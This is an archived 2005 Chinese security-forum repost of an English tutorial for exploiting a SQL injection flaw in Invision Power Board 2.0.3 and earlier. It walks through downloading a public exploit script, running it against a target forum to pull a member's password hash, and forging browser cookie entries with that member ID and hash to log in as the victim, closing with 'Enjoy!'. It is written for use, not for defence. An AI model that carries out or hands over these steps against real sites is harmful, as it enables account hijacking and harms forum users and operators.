邪恶八进制信息安全团队技术讨论组's Archiver

EvilOctal 2005-5-29 02:13

[转载]IPB <= 2.0.3 Login.PHP SQL Injection漏洞资料

文章作者:Danica Jones

Tutorial for the recent exploit released by Petey Beege.

1. Get the exploit from [url]http://www.milw0rm.com/id.php?id=1013[/url]
2. Make sure you have LWP::UserAgent perl module if not do this:
    a. perl -MCPAN -s 'shell'
    b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id

ex. inv.pl [url]http://forums.elitesite.com[/url] 2 2

Where 2 is the login id and 2 for version 2 of IPB.

4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at

C:\Documents and Settings\the1\Application
Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"

Add the following entries:

forums.elitesite.com      FALSE      /      FALSE
1148708747      member_id      1
forums.elitesite.com      FALSE      /      FALSE
1148708747      pass_hash      ecb735f70028a9cdb819828f4aced78c

Notice the value of member_id and pass_hash taken from the values
generated by the exploit.

5. Fire up Mozilla Firefox and login to [url]http://forums.elitesite.com[/url]

Enjoy!

页: [1]
© 1999-2008 EvilOctal Security Team